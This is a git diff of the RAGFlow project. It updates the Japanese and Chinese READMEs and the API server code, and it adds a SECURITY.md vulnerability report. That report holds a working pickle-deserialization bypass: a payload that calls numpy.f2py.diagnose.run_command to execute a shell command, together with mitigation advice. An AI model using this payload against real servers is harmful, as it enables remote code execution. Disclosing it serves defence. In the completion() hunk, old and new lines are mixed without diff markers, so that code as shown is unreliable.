+  <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
+  <a href="https://twitter.com/infiniflowai">Twitter</a> |
+  <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
+  <a href="https://demo.ragflow.io">Demo</a>
+</h4>
+
 ## 💡 RAGFlow とは?

-[RAGFlow](https://demo.ragflow.io) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
+[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。

 ## 🎮 Demo

 デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
 </div>

+## 📌 最新情報
+- 2024-07-08 [Graph](./graph/README.md) に対応しました。
+- 2024-06-27 Q&A解析方式はMarkdownファイルとDocxファイルをサポートしています。Docxファイルからの画像の抽出をサポートします。Markdownファイルからテーブルを抽出することをサポートします。
+- 2024-06-14 Q&A 解析メソッドは PDF ファイルをサポートしています。
+- 2024-06-06 会話設定でデフォルトでチェックされている [Self-RAG](https://huggingface.co/papers/2310.11511) をサポートします。
+- 2024-05-30 [BCE](https://github.com/netease-youdao/BCEmbedding) 、[BGE](https://github.com/FlagOpen/FlagEmbedding) reranker を統合。
+- 2024-05-28 LLM BaichuanとVolcanoArkを統合しました。
+- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
+- 2024-05-21 ストリーミング出力とテキストチャンク取得APIをサポート。
+- 2024-05-15 OpenAI GPT-4oを統合しました。
+
 ## 🌟 主な特徴

@@ -53,15 +83,6 @@
 - 複数の想起と融合された再ランク付け。
 - 直感的な API によってビジネスとの統合がシームレスに。

-## 📌 最新の機能
-
-- 2024-04-16 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) から埋め込みモデル「bce-embedding-base_v1」を追加します。
-- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) は、軽量かつ高速な埋め込み用に設計されています。
-- 2024-04-11 ローカル LLM デプロイメント用に [Xinference](./docs/xinference.md) をサポートします。
-- 2024-04-10 メソッド「Laws」に新しいレイアウト認識モデルを追加します。
-- 2024-04-08 [Ollama](./docs/ollama.md) を使用した大規模モデルのローカライズされたデプロイメントをサポートします。
-- 2024-04-07 中国語インターフェースをサポートします。

 ## 🔎 システム構成

 <div align="center" style="margin-top:20px;margin-bottom:20px;">

@@ -72,14 +93,15 @@

 ### 📝 必要条件

-- CPU >= 2 cores
-- RAM >= 8 GB
+- CPU >= 4 cores
+- RAM >= 16 GB
 - Disk >= 50 GB
 - Docker >= 24.0.0 & Docker Compose >= v2.26.1
 > ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。

 ### 🚀 サーバーを起動

-1. `vm.max_map_count` >= 262144 であることを確認する【[もっと](./docs/max_map_count.md)】:
+1. `vm.max_map_count` >= 262144 であることを確認する:

 > `vm.max_map_count` の値をチェックするには:
 >

@@ -114,7 +136,9 @@
 $ docker compose up -d
 ```

-> コアイメージのサイズは約 15 GB で、ロードに時間がかかる場合があります。
+> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.8.0として、上記のコマンドを実行してください。
+
+> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。

 4. サーバーを立ち上げた後、サーバーの状態を確認する:

@@ -137,12 +161,13 @@
 * Running on http://x.x.x.x:9380
 INFO:werkzeug:Press CTRL+C to quit
 ```
+> もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。

 5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
 > デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
 6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。

-> 詳しくは [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) を参照してください。
+> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。

 _これで初期設定完了!ショーの開幕です!_

@@ -173,15 +198,78 @@
 ```bash
 $ git clone https://github.com/infiniflow/ragflow.git
 $ cd ragflow/
-$ docker build -t infiniflow/ragflow:v0.2.0 .
+$ docker build -t infiniflow/ragflow:v0.8.0 .
 $ cd ragflow/docker
 $ chmod +x ./entrypoint.sh
 $ docker compose up -d
 ```

+## 🛠️ ソースコードからサービスを起動する方法
+
+ソースコードからサービスを起動する場合は、以下の手順に従ってください:
+
+1. リポジトリをクローンします
+```bash
+$ git clone https://github.com/infiniflow/ragflow.git
+$ cd ragflow/
+```
+
+2. 仮想環境を作成します(AnacondaまたはMinicondaがインストールされていることを確認してください)
+```bash
+$ conda create -n ragflow python=3.11.0
+$ conda activate ragflow
+$ pip install -r requirements.txt
+```
+CUDAのバージョンが12.0以上の場合、以下の追加コマンドを実行してください:
+```bash
+$ pip uninstall -y onnxruntime-gpu
+$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
+```
+
+3. エントリースクリプトをコピーし、環境変数を設定します
+```bash
+$ cp docker/entrypoint.sh .
+$ vi entrypoint.sh
+```
+以下のコマンドでPythonのパスとragflowプロジェクトのパスを取得します:
+```bash
+$ which python
+$ pwd
+```
+
+`which python`の出力を`PY`の値として、`pwd`の出力を`PYTHONPATH`の値として設定します。
+
+`LD_LIBRARY_PATH`が既に設定されている場合は、コメントアウトできます。
+
+```bash
+# 実際の状況に応じて設定を調整してください。以下の二つのexportは新たに追加された設定です
+PY=${PY}
+export PYTHONPATH=${PYTHONPATH}
+# オプション:Hugging Faceミラーを追加
+export HF_ENDPOINT=https://hf-mirror.com
+```
+
+4. 基本サービスを起動します
+```bash
+$ cd docker
+$ docker compose -f docker-compose-base.yml up -d
+```
+
+5. 設定ファイルを確認します
+**docker/.env**内の設定が**conf/service_conf.yaml**内の設定と一致していることを確認してください。**service_conf.yaml**内の関連サービスのIPアドレスとポートは、ローカルマシンのIPアドレスとコンテナが公開するポートに変更する必要があります。
+
+6. サービスを起動します
+```bash
+$ chmod +x ./entrypoint.sh
+$ bash ./entrypoint.sh
+```
+
 ## 📚 ドキュメンテーション

-- [FAQ](./docs/faq.md)
+- [Quickstart](https://ragflow.io/docs/dev/)
+- [User guide](https://ragflow.io/docs/dev/category/user-guides)
+- [References](https://ragflow.io/docs/dev/category/references)
+- [FAQ](https://ragflow.io/docs/dev/faq)

 ## 📜 ロードマップ

@@ -191,7 +279,8 @@ $ docker compose up -d

 - [Discord](https://discord.gg/4XxujFgUN7)
 - [Twitter](https://twitter.com/infiniflowai)
+- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

 ## 🙌 コントリビュート

-RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず[コントリビューションガイド](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md)をご覧ください。
+RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず[コントリビューションガイド](./docs/references/CONTRIBUTING.md)をご覧ください。
README_zh.md (156 changes)

@@ -11,19 +11,49 @@
 </p>

 <p align="center">
+  <a href="https://github.com/infiniflow/ragflow/releases/latest">
+    <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
+  </a>
   <a href="https://demo.ragflow.io" target="_blank">
-    <img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
+    <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
   <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
-    <img src="https://img.shields.io/badge/docker_pull-ragflow:v1.0-brightgreen"
-        alt="docker pull infiniflow/ragflow:v0.2.0"></a>
+    <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.8.0"></a>
   <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
-    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
+    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
   </a>
 </p>

+<h4 align="center">
+  <a href="https://ragflow.io/docs/dev/">Document</a> |
+  <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
+  <a href="https://twitter.com/infiniflowai">Twitter</a> |
+  <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
+  <a href="https://demo.ragflow.io">Demo</a>
+</h4>
+
 ## 💡 RAGFlow 是什么?

-[RAGFlow](https://demo.ragflow.io) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
+[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。

 ## 🎮 Demo 试用

 请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
 </div>

+## 📌 近期更新
+
+- 2024-07-08 支持 [Graph](./graph/README.md)。
+- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件。支持提取出 Docx 文件中的图片。支持提取出 Markdown 文件中的表格。
+- 2024-06-14 Q&A 解析方式支持 PDF 文件。
+- 2024-06-06 支持 [Self-RAG](https://huggingface.co/papers/2310.11511) ,在对话设置里面默认勾选。
+- 2024-05-30 集成 [BCE](https://github.com/netease-youdao/BCEmbedding) 和 [BGE](https://github.com/FlagOpen/FlagEmbedding) 重排序模型。
+- 2024-05-28 集成大模型 Baichuan 和火山方舟。
+- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
+- 2024-05-21 支持流式结果输出和文本块获取API。
+- 2024-05-15 集成大模型 OpenAI GPT-4o。
+
 ## 🌟 主要功能

@@ -44,7 +74,7 @@

 ### 🍔 **兼容各类异构数据源**

-- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
+- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。

 ### 🛀 **全程无忧、自动化的 RAG 工作流**

@@ -53,15 +83,6 @@
 - 基于多路召回、融合重排序。
 - 提供易用的 API,可以轻松集成到各类企业系统。

-## 📌 新增功能
-
-- 2024-04-16 添加嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 。
-- 2024-04-16 添加 [FastEmbed](https://github.com/qdrant/fastembed) 专为轻型和高速嵌入而设计。
-- 2024-04-11 支持用 [Xinference](./docs/xinference.md) 本地化部署大模型。
-- 2024-04-10 为‘Laws’版面分析增加了底层模型。
-- 2024-04-08 支持用 [Ollama](./docs/ollama.md) 本地化部署大模型。
-- 2024-04-07 支持中文界面。

 ## 🔎 系统架构

 <div align="center" style="margin-top:20px;margin-bottom:20px;">

@@ -72,14 +93,15 @@

 ### 📝 前提条件

-- CPU >= 2 核
-- RAM >= 8 GB
+- CPU >= 4 核
+- RAM >= 16 GB
 - Disk >= 50 GB
 - Docker >= 24.0.0 & Docker Compose >= v2.26.1
 > 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。

 ### 🚀 启动服务器

-1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/max_map_count.md)】:
+1. 确保 `vm.max_map_count` 不小于 262144:

 > 如需确认 `vm.max_map_count` 的大小:
 >

@@ -114,7 +136,9 @@
 $ docker compose -f docker-compose-CN.yml up -d
 ```

-> 核心镜像文件大约 15 GB,可能需要一定时间拉取。请耐心等待。
+> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.8.0,然后运行上述命令。
+
+> 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。

 4. 服务器启动成功后再次确认服务器状态:

@@ -137,12 +161,13 @@
 * Running on http://x.x.x.x:9380
 INFO:werkzeug:Press CTRL+C to quit
 ```
+> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network anomaly` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。

 5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
 > 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
 6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。

-> 详见 [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md)。
+> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。

 _好戏开始,接着奏乐接着舞!_

@@ -173,15 +198,99 @@
 ```bash
 $ git clone https://github.com/infiniflow/ragflow.git
 $ cd ragflow/
-$ docker build -t infiniflow/ragflow:v0.2.0 .
+$ docker build -t infiniflow/ragflow:v0.8.0 .
 $ cd ragflow/docker
 $ chmod +x ./entrypoint.sh
 $ docker compose up -d
 ```

+## 🛠️ 源码启动服务
+
+如需从源码启动服务,请参考以下步骤:
+
+1. 克隆仓库
+```bash
+$ git clone https://github.com/infiniflow/ragflow.git
+$ cd ragflow/
+```
+
+2. 创建虚拟环境(确保已安装 Anaconda 或 Miniconda)
+```bash
+$ conda create -n ragflow python=3.11.0
+$ conda activate ragflow
+$ pip install -r requirements.txt
+```
+如果cuda > 12.0,需额外执行以下命令:
+```bash
+$ pip uninstall -y onnxruntime-gpu
+$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
+```
+
+3. 拷贝入口脚本并配置环境变量
+```bash
+$ cp docker/entrypoint.sh .
+$ vi entrypoint.sh
+```
+使用以下命令获取python路径及ragflow项目路径:
+```bash
+$ which python
+$ pwd
+```
+
+将上述`which python`的输出作为`PY`的值,将`pwd`的输出作为`PYTHONPATH`的值。
+
+`LD_LIBRARY_PATH`如果环境已经配置好,可以注释掉。
+
+```bash
+# 此处配置需要按照实际情况调整,两个export为新增配置
+PY=${PY}
+export PYTHONPATH=${PYTHONPATH}
+# 可选:添加Hugging Face镜像
+export HF_ENDPOINT=https://hf-mirror.com
+```
+
+4. 启动基础服务
+```bash
+$ cd docker
+$ docker compose -f docker-compose-base.yml up -d
+```
+
+5. 检查配置文件
+确保**docker/.env**中的配置与**conf/service_conf.yaml**中配置一致, **service_conf.yaml**中相关服务的IP地址与端口应该改成本机IP地址及容器映射出来的端口。
+
+6. 启动服务
+```bash
+$ chmod +x ./entrypoint.sh
+$ bash ./entrypoint.sh
+```
+
+7. 启动WebUI服务
+```bash
+$ cd web
+$ npm install --registry=https://registry.npmmirror.com --force
+$ vim .umirc.ts
+# 修改proxy.target为http://127.0.0.1:9380
+$ npm run dev
+```
+
+8. 部署WebUI服务
+```bash
+$ cd web
+$ npm install --registry=https://registry.npmmirror.com --force
+$ umi build
+$ mkdir -p /ragflow/web
+$ cp -r dist /ragflow/web
+$ apt install nginx -y
+$ cp ../docker/nginx/proxy.conf /etc/nginx
+$ cp ../docker/nginx/nginx.conf /etc/nginx
+$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
+$ systemctl start nginx
+```
+
 ## 📚 技术文档

-- [FAQ](./docs/faq.md)
+- [Quickstart](https://ragflow.io/docs/dev/)
+- [User guide](https://ragflow.io/docs/dev/category/user-guides)
+- [References](https://ragflow.io/docs/dev/category/references)
+- [FAQ](https://ragflow.io/docs/dev/faq)

 ## 📜 路线图

@@ -191,10 +300,11 @@ $ docker compose up -d

 - [Discord](https://discord.gg/4XxujFgUN7)
 - [Twitter](https://twitter.com/infiniflowai)
+- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

 ## 🙌 贡献指南

-RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) 。
+RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](./docs/references/CONTRIBUTING.md) 。

 ## 👥 加入社区
SECURITY.md (new file, 74 lines)

@@ -0,0 +1,74 @@

# Security Policy

## Supported Versions

Use this section to tell people about which versions of your project are
currently being supported with security updates.

| Version | Supported          |
| ------- | ------------------ |
| <=0.7.0 | :white_check_mark: |

## Reporting a Vulnerability

### Branch name

main

### Actual behavior

The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable, leading to code execution.
The main reason is that the numpy module has a numpy.f2py.diagnose.run_command function that directly executes commands, but the restricted_loads function allows users to import functions from the numpy module.

### Steps to reproduce

**ragflow_patch.py**

```py
import builtins
import io
import pickle

safe_module = {
    'numpy',
    'rag_flow'
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        import importlib
        if module.split('.')[0] in safe_module:
            _module = importlib.import_module(module)
            return getattr(_module, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


def restricted_loads(src):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(src)).load()
```

Then, **PoC.py**

```py
import pickle
from ragflow_patch import restricted_loads

class Exploit:
    def __reduce__(self):
        import numpy.f2py.diagnose
        return numpy.f2py.diagnose.run_command, ('whoami', )

Payload = pickle.dumps(Exploit())
restricted_loads(Payload)
```

**Result**


### Additional information

#### How to prevent?

Strictly filter the module and name before calling with the getattr function.
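The prevention advice above can be made concrete. Below is a minimal sketch of an exact-match allowlist for `find_class`, where each `(module, name)` pair must be explicitly approved; the entries in `SAFE_GLOBALS` are illustrative assumptions, not ragflow's actual requirements:

```py
import importlib
import io
import pickle

# Hypothetical allowlist (illustrative): each module maps to the exact
# attribute names that unpickling may resolve. Everything else is rejected.
SAFE_GLOBALS = {
    "numpy": {"ndarray", "dtype"},
    "numpy.core.multiarray": {"_reconstruct"},
}


class StrictUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Match the full (module, name) pair rather than trusting an entire
        # package tree, so numpy.f2py.diagnose.run_command is rejected.
        if name in SAFE_GLOBALS.get(module, set()):
            return getattr(importlib.import_module(module), name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def strict_loads(src):
    """Analogous to pickle.loads(), but with an exact-match allowlist."""
    return StrictUnpickler(io.BytesIO(src)).load()
```

Checking the full `(module, name)` pair instead of only the top-level package closes the hole exploited above, since `numpy.f2py.diagnose.run_command` no longer matches any allowlisted entry.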
@@ -54,7 +54,7 @@ app.errorhandler(Exception)(server_error_response)
 #app.config["LOGIN_DISABLED"] = True
 app.config["SESSION_PERMANENT"] = False
 app.config["SESSION_TYPE"] = "filesystem"
-app.config['MAX_CONTENT_LENGTH'] = os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024)
+app.config['MAX_CONTENT_LENGTH'] = int(os.environ.get("MAX_CONTENT_LENGTH", 128 * 1024 * 1024))

 Session(app)
 login_manager = LoginManager()

@@ -63,12 +63,17 @@ login_manager.init_app(app)

 def search_pages_path(pages_dir):
-    return [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
+    app_path_list = [path for path in pages_dir.glob('*_app.py') if not path.name.startswith('.')]
+    api_path_list = [path for path in pages_dir.glob('*_api.py') if not path.name.startswith('.')]
+    app_path_list.extend(api_path_list)
+    return app_path_list


 def register_page(page_path):
-    page_name = page_path.stem.rstrip('_app')
-    module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name, ))
+    path = f'{page_path}'
+
+    page_name = page_path.stem.rstrip('_api') if "_api" in path else page_path.stem.rstrip('_app')
+    module_name = '.'.join(page_path.parts[page_path.parts.index('api'):-1] + (page_name,))

     spec = spec_from_file_location(module_name, page_path)
     page = module_from_spec(spec)

@@ -76,9 +81,8 @@ def register_page(page_path):
     page.manager = Blueprint(page_name, module_name)
     sys.modules[module_name] = page
     spec.loader.exec_module(page)
-
     page_name = getattr(page, 'page_name', page_name)
-    url_prefix = f'/{API_VERSION}/{page_name}'
+    url_prefix = f'/api/{API_VERSION}/{page_name}' if "_api" in path else f'/{API_VERSION}/{page_name}'

     app.register_blueprint(page.manager, url_prefix=url_prefix)
     return url_prefix

@@ -86,7 +90,7 @@ def register_page(page_path):

 pages_dir = [
     Path(__file__).parent,
-    Path(__file__).parent.parent / 'api' / 'apps',
+    Path(__file__).parent.parent / 'api' / 'apps', # FIXME: ragflow/api/api/apps, can be remove?
 ]

 client_urls_prefix = [
@ -13,18 +13,32 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import os
|
||||
import re
|
||||
from datetime import datetime, timedelta
|
||||
from flask import request
|
||||
from flask import request, Response
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.db_models import APIToken, API4Conversation
|
||||
|
||||
from api.db import FileType, ParserType, FileSource
|
||||
from api.db.db_models import APIToken, API4Conversation, Task, File
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.api_service import APITokenService, API4ConversationService
|
||||
from api.db.services.dialog_service import DialogService, chat
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.task_service import queue_tasks, TaskService
|
||||
from api.db.services.user_service import UserTenantService
|
||||
from api.settings import RetCode
|
||||
from api.settings import RetCode, retrievaler
|
||||
from api.utils import get_uuid, current_timestamp, datetime_format
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, get_json_result, validate_request
|
||||
from itsdangerous import URLSafeTimedSerializer
|
||||
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
from rag.utils.minio_conn import MINIO
|
||||
|
||||
|
||||
def generate_confirmation_token(tenent_id):
|
||||
serializer = URLSafeTimedSerializer(tenent_id)
|
||||
@ -105,8 +119,8 @@ def stats():
|
||||
res = {
|
||||
"pv": [(o["dt"], o["pv"]) for o in objs],
|
||||
"uv": [(o["dt"], o["uv"]) for o in objs],
|
||||
"speed": [(o["dt"], o["tokens"]/o["duration"]) for o in objs],
|
||||
"tokens": [(o["dt"], o["tokens"]/1000.) for o in objs],
|
||||
"speed": [(o["dt"], float(o["tokens"])/(float(o["duration"]+0.1))) for o in objs],
|
||||
"tokens": [(o["dt"], float(o["tokens"])/1000.) for o in objs],
|
||||
"round": [(o["dt"], o["round"]) for o in objs],
|
||||
"thumb_up": [(o["dt"], o["thumb_up"]) for o in objs]
|
||||
}
|
||||
@ -115,8 +129,7 @@ def stats():
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/new_conversation', methods=['POST'])
|
||||
@validate_request("user_id")
|
||||
@manager.route('/new_conversation', methods=['GET'])
|
||||
def set_conversation():
|
||||
token = request.headers.get('Authorization').split()[1]
|
||||
objs = APIToken.query(token=token)
|
||||
@ -131,7 +144,7 @@ def set_conversation():
|
||||
conv = {
|
||||
"id": get_uuid(),
|
||||
"dialog_id": dia.id,
|
||||
"user_id": req["user_id"],
|
||||
"user_id": request.args.get("user_id", ""),
|
||||
"message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}]
|
||||
}
|
||||
API4ConversationService.save(**conv)
|
||||
@@ -155,6 +168,7 @@ def completion():
        e, conv = API4ConversationService.get_by_id(req["conversation_id"])
        if not e:
            return get_data_error_result(retmsg="Conversation not found!")
        if "quote" not in req: req["quote"] = False

        msg = []
        for m in req["messages"]:
@@ -171,14 +185,59 @@ def completion():
            return get_data_error_result(retmsg="Dialog not found!")
        del req["conversation_id"]
        del req["messages"]
        ans = chat(dia, msg, **req)

        if not conv.reference:
            conv.reference = []
        conv.message.append({"role": "assistant", "content": ""})
        conv.reference.append({"chunks": [], "doc_aggs": []})

        def fillin_conv(ans):
            nonlocal conv
            if not conv.reference:
                conv.reference.append(ans["reference"])
                conv.message.append({"role": "assistant", "content": ans["answer"]})
            else: conv.reference[-1] = ans["reference"]
            conv.message[-1] = {"role": "assistant", "content": ans["answer"]}

        def rename_field(ans):
            for chunk_i in ans['reference'].get('chunks', []):
                chunk_i['doc_name'] = chunk_i['docnm_kwd']
                chunk_i.pop('docnm_kwd')

        def stream():
            nonlocal dia, msg, req, conv
            try:
                for ans in chat(dia, msg, True, **req):
                    fillin_conv(ans)
                    rename_field(ans)
                    yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
                API4ConversationService.append_message(conv.id, conv.to_dict())
        APITokenService.APITokenService(token)
        return get_json_result(data=ans)
            except Exception as e:
                yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                            "data": {"answer": "**ERROR**: "+str(e), "reference": []}},
                                           ensure_ascii=False) + "\n\n"
            yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

        if req.get("stream", True):
            resp = Response(stream(), mimetype="text/event-stream")
            resp.headers.add_header("Cache-control", "no-cache")
            resp.headers.add_header("Connection", "keep-alive")
            resp.headers.add_header("X-Accel-Buffering", "no")
            resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
            return resp
        else:
            answer = None
            for ans in chat(dia, msg, **req):
                answer = ans
                fillin_conv(ans)
                API4ConversationService.append_message(conv.id, conv.to_dict())
                break

            for chunk_i in answer['reference'].get('chunks',[]):
                chunk_i['doc_name'] = chunk_i['docnm_kwd']
                chunk_i.pop('docnm_kwd')

            return get_json_result(data=answer)

    except Exception as e:
        return server_error_response(e)

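The streamed branch above emits Server-Sent-Events frames of the form "data: {retcode, retmsg, data}\n\n", with a final frame whose data is the literal true. A minimal consumer sketch, assuming the server address and token are placeholders and stream is left at its default of true:

import json
import requests  # hypothetical client for the SSE branch shown above

BASE = "http://localhost:9380/api"                    # assumed server address
HEADERS = {"Authorization": "Bearer YOUR_API_TOKEN"}  # placeholder token
body = {"conversation_id": "CONV_ID",
        "messages": [{"role": "user", "content": "hi"}]}

with requests.post(f"{BASE}/completion", headers=HEADERS, json=body, stream=True) as r:
    for line in r.iter_lines(decode_unicode=True):
        if not line or not line.startswith("data:"):
            continue                          # skip blank separators between frames
        frame = json.loads(line[len("data:"):])
        if frame["data"] is True:             # final sentinel frame from the generator
            break
        print(frame["data"]["answer"])        # cumulative answer text so far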
@@ -191,6 +250,334 @@ def get(conversation_id):
        if not e:
            return get_data_error_result(retmsg="Conversation not found!")

        return get_json_result(data=conv.to_dict())
        conv = conv.to_dict()
        for referenct_i in conv['reference']:
            for chunk_i in referenct_i['chunks']:
                if 'docnm_kwd' in chunk_i.keys():
                    chunk_i['doc_name'] = chunk_i['docnm_kwd']
                    chunk_i.pop('docnm_kwd')
        return get_json_result(data=conv)
    except Exception as e:
        return server_error_response(e)


@manager.route('/document/upload', methods=['POST'])
@validate_request("kb_name")
def upload():
    token = request.headers.get('Authorization').split()[1]
    objs = APIToken.query(token=token)
    if not objs:
        return get_json_result(
            data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)

    kb_name = request.form.get("kb_name").strip()
    tenant_id = objs[0].tenant_id

    try:
        e, kb = KnowledgebaseService.get_by_name(kb_name, tenant_id)
        if not e:
            return get_data_error_result(
                retmsg="Can't find this knowledgebase!")
        kb_id = kb.id
    except Exception as e:
        return server_error_response(e)

    if 'file' not in request.files:
        return get_json_result(
